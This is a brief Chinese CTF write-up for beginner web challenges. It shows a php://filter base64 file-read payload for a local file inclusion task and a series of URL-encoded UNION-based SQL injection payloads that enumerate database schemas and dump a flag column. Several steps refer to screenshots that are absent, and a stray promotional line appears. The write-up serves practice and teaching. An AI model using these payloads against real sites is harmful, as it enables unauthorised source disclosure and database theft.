[第一章 web入门]afr_2
打开源码看到:
加上/img看到:
继续查看目录:
看到flag,下载下来看到:
[第一章 web入门]afr_1
根据题目我们知道考察的是** php://协议**
php://filter 读取源代码并进行base64编码输出,不然会直接当做php代码执行就看不到源代码内容了。
/?p=php://filter/convert.base64-encode/resource=flag
[第一章 web入门]SQL注入-1
-1%27%20union%20select%201,2,group_concat(schema_name)%20from%20information_schema.schemata%23
-1%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables where table_schema='note'%23
-1%27%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns where table_name=‘fl4g’%23
扫描二维码关注公众号,回复:
12717618 查看本文章
-1%27%20union%20select%201,2,group_concat(concat_ws(0x23,fllllag)) from note.fl4g%23
